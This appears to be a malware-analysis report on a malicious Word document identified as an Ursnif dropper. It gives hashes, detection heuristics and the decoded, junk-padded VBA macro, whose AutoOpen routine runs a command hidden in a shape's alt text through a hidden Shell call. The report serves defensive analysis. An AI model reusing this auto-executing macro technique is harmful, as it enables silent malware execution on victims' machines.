Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 1d39391c81424ffa…

MALICIOUS

Office (OLE)

69.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: f4781b7d4ae54f21b837019e6f1a145d SHA-1: 54037790ef4ff3fb56a163700b2730e0bad434ec SHA-256: 1d39391c81424ffa91640783d6b8d4344c67e6c672eba4fbedbc4a68a4bfc56e
142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Ursnif-6864686-0, indicating the Ursnif family. A critical heuristic firing confirms the presence of an AutoOpen VBA macro. The extracted VBA script, named 'macros.bas', contains an AutoOpen subroutine that calls the 'mIOzlp' function. This function appears to retrieve a value from 'mIOzlp.AlternativeText' and then executes it as a command using 'Interaction.Shell'. This functionality strongly suggests the macro is designed to download and execute a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1661 bytes
SHA-256: 0df114fb0b7e9029b390a635260ef547fccc8a9900ca03ab1201d51b56a65d12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rgulyri"
Function mIOzlp()

Dim ExuhlVDT As Integer
Dim qfLEGz As Long
ExuhlVDT = 4213# - 6229#
Dim vgobukyhix As Variant
vgobukyhix = ExuhlVDT - 9965#

Dim xbymywejok As Integer
Dim zdovohika As Long
xbymywejok = 1334# - 9214#
Dim rxoxobomux As Variant
rxoxobomux = xbymywejok - 2321#

Dim dtobohuki As Integer
Dim pdyny As Long
dtobohuki = 1226# - 3484#
Dim HcrlkQ As Variant
HcrlkQ = dtobohuki - 1714#

Dim lcurajeme As Integer
Dim CFxGXK As Long
lcurajeme = 4867# - 7081#
Dim vfalod As Variant
vfalod = lcurajeme - 5116#

Dim uLABPxXF As Integer
Dim jporuji As Long
uLABPxXF = 5526# - 1548#
Dim dzuc As Variant
dzuc = uLABPxXF - 4522#

Set mIOzlp = ActiveDocument.Shapes(2)

Dim dxXzJp As Integer
Dim TIhTgHWQ As Long
dxXzJp = 1288# - 9586#
Dim lfit As Variant
lfit = dxXzJp - 3319#



End Function
Sub AutoOpen()

Dim rdTvuWr As Integer
Dim AXaBP As Long
rdTvuWr = 8177# - 6383#
Dim gmiqa As Variant
gmiqa = rdTvuWr - 7319#

Dim TKVwf As Integer
Dim pnomeleni As Long
TKVwf = 6119# - 8926#
Dim lfjOQ As Variant
lfjOQ = TKVwf - 4487#



Set fdenolomy = mIOzlp

vpuxiw = mIOzlp.AlternativeText





Interaction.Shell@ _
vpuxiw, vbHide





Dim bpig As Integer
Dim nrJCdSF As Long
bpig = 3660# - 9365#
Dim wcixyharex As Variant
wcixyharex = bpig - 8503#



End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.